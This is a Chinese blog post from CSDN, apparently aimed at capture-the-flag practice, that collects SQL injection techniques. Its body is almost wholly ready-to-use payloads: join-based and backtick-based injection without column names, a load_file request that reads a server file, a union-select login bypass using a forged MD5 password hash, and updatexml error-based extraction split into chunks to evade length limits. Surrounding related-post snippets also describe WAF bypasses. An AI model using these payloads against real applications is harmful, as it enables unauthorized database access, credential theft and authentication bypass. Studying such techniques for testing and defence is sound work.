sql注入姿势

最新推荐文章于 2024-05-17 08:40:50 发布
最新推荐文章于 2024-05-17 08:40:50 发布
阅读量211 收藏 1
点赞数
分类专栏: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pop364/article/details/104958176
版权

0x01利用join进行无列名注入

获取第一列的列名

?id=-1' union all select * from (select * from users as a join users b)c--+

获取次列及后续列名(using(a,b)查a,b下一个字段

?id=-1' union all select * from (select * from users as a join users b using(id,username))c--+

0x02反引号/反引号被注释无列名注入

select `4` from (select 1,2,3,4,5,6 union select * from users)a;
select b from (select 1,2,3 as b,4,5 union select * from users)a;

https://www.jianshu.com/p/dc9af4ca2d06

0x03带外注入

https://www.jianshu.com/p/19ef493da938
https://www.cnblogs.com/leixiao-/p/9876313.html
https://www.jianshu.com/p/6ea6a63dc5c8

0x04未过滤load_file

?no=0+unIon/**/select+1,load_file(’/var/www/html/flag.php’),1,1

0x05联合查询构造

发现我们在联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据
所以我们在这里进行绕过,即输入admin,密码设置为123456,将123456MD5加密后放进union select 查询中
也就是当name代入查询查询时,在MySQL里面就会生成用户名为admin,密码为123456 MD5加密后的虚拟的数据,同时我们用123456密码进行登录,就能够绕过限制。

union select 1,"admin","e10adc3949ba59abbe56e057f20f883e";#

0x06回显长度限制

substr(password,0,30)
substr(password,30,30)
select(left(password,30))from(H4rDsq1)
select(right(password,30))from(H4rDsq1)
?username=adminnn%27or(updatexml(1,concat(0x7e,(select(left(password,30))from(H4rDsq1)),0x7e),1))%23&password=123456
Ai Hyperion
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第07篇:Bypass 360主机卫士SQL注入防御(多姿势)1
08-03
0x01 环境搭建360主机卫士官网:http://zhuji.360.cn 软件版本:360主机卫士Apache 纪念版 测试环境:phpStudy本地构造S
第五篇:Bypass 护卫神SQL注入防御(多姿势)1
08-03
0x01 环境搭建护卫神官网:http://www.huweishen.com软件版本:护卫神·入侵防护系统 V3.8.1 最新版本下载地址:http://do
SQL注入姿势
cyjmosthandsome的博客
03-02 602
一、双等号绕过 例题:http://ctf5.shiyanbar.com/web/wonderkun/web/index.html(登陆一下好吗) payload:username=a'='&password=a'=' username=a'='0&password=a'='0 解析: 后端PHP代码应该为:select ** fro...
SQL注入姿势(1)
weixin_44300286的博客
04-26 427
第一关 第一关就是属于五种漏洞类型的第一种(基于错误的get单引号字符型注入) 1、常规性测试 先输入不同的id参数值,id=1、2、3… ,发现网页正常返回结果 2、判断注入点 一般注入点有 ‘,",无,),’),")等 ,后面接or 1=1 和 1=2 输入id=1’,页面输出错误信息 由此我们可以推测出后台的select语句应该为:select * from table where id...
sql注入原理及各姿势sqlmap使用
最新发布
2401_84281748的博客
05-17 593
三、判断数据显示点?id=-1’ union select 1,2,3 --+ //可以把注入点改为负数或零达到注释前半段语句的效果四、显示用户和数据库名五、查看所有表六、查看表里的所有列七、查看字段值。
SQL注入姿势(3)
weixin_44300286的博客
07-27 145
盲注 **前言:**之前就想写一篇与盲注有关的博客,但由于一直不会写脚本,就拖下来了,现在把博客补上,因为手工注入比较麻烦,所以这篇主要写脚本注入。 bool盲注 以sqli-labs第8关为例 第8关是bool盲注,首先判断注入点(无论什么注入,第一步都是判断注入点,就算写脚本第一步也要判断注入点),经过一番尝试,判断出闭合符号是单引号。 在写脚本之前,我们先了解下脚本的思路: bool盲注的...
sql注入绕过姿势--骚姿势大全
yggcwhat
05-07 353
sql注入绕过姿势--骚姿势大全
第二篇:Bypass X-WAF SQL注入防御(多姿势)1
08-03
Bypass X-WAF SQL注入防御多姿势分析 通过对X-WAF的代码分析,我们可以了解到WAF的工作原理,并找到Bypass的方法。X-WAF是一款适用中、小企业的云WAF系统,让中、小企业也可以非常方便地拥有自己的免费云WAF。 ...
我的WafBypass之路(SQL注入篇)
07-11
很多人一遇到waf就发懵,不知如何是好,能搜到的各种姿势也是然并卵。但是积累姿势的过程也是迭代的,那么就有了此文,用来总结一些学习和培养突破waf的思想。可能总结的并不全,但目的并不是讲那些网上搜来一大把的...
第10篇:Bypass 护卫神SQL注入防御(多姿势)1
08-03
0x01 环境搭建护卫神官网:http://www.huweishen.com软件版本:护卫神·入侵防护系统 V3.8.1 最新版本下载地址:http://do
超全的SQL注入姿势总结
记录学习,一起进步
01-12 1397
超全的SQL注入姿势总结
Bypass X-WAF SQL注入防御(多姿势
3569
04-22 700
https://mp.weixin.qq.com/s/5TQddrOqa8MmtsuHoCRu0Q   Bypass X-WAF SQL注入防御(多姿势) https://www.anquanke.com/post/id/103771  打破基于OpenResty的WEB安全防护(CVE-2018-9230)先来一张拦截效果图利用参数溢出Bypass:绕过姿势:带上 X-Real-IP:8.8.8...
SQL无列名注入方法总结(基于union, join)
DawdleD的博客
05-25 2704
本文要点 通过对基于join的无列名注入攻击的研究,本文提出了一种场景以及对应的攻击方法,该攻击方法不需要使用using关键字。 本文整理了相关的博文,将在篇末展示(由于该篇博文是原创博文所以我不会把它们的内容照搬过来,请自行取阅) 一种基于join的无列名注入-1 select Host,User,Select_priv from user where User="root" 在上述场景中用户可以控制的输入是字符串"root",假设的攻击场景中我们可以突破双引号闭合并进行任意sql注入。但是我们
列名注入和pow()溢出报错注入
7hinkSource的博客
04-28 1156
列名注入注入时,有可能会遇到过滤掉or的情况,这样information_schema就不能用了,这时候我们可以采用无列名注入。 union select会在查询的查询的数据的最后添加联合查询的数据: 我们先用这个方法生成一个虚拟表,生成的虚拟表的列名为1,2,3,并在这个虚拟表里查询数据(虚拟表需要命名,否则会报错) 反单引号表示列名或者表名 pow()溢出报错注入 pow(x,...
21年国赛 -- easy_sql --- 利用join进行列名注入
Zero_Adam的博客
05-18 322
这个利用join进行列名注入,获取 数据表名称的方法, 只能够,在不是bool盲注的时候使用,也就是必须要有回显,因为我们没有办法将错误信息给select出来, 这个join报错获得表名 这个方法,是一定要用到报错注入的是吧,(我猜是) 如果是外显式的话,就报错直接出了,像这次国赛这个题一样 但是 如果试bool型盲注的话,也就是外显只有 0 1 情况的话, 那应该就没有办法了。因为我们没有办法把报错信息 给 select 出来,也就没有办法进行substr进行bool判断,比较, sel
sql注入原理及各姿势sqlmap使用,2024年最新万分膜拜
2301_76348014的博客
04-10 1226
外链图片转存中…(img-7TUBUIrx-1712718373873)]
SQL注入注入姿势和Bypass)
2301_79870948的博客
03-20 802
UNION 操作符用于连接两个以上的 SELECT 语句的结果组合到一个结果集合中。前提是两个select必有相同列。注意:要用联合查询进行注入则:页面必须有显示位首先,便要判断注入点的列数,这里使用order by + 列数--+联合查询注入:这里通过查询数据表不存在的数据,从而执行后面的union语句,来获取显示位使用联合查询注入爆出敏感数据:得到了数据库名后,进行下一步,得到表名下一步,得到字段名,强调数据库名和表名可以使查到的数据更准),3--+

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值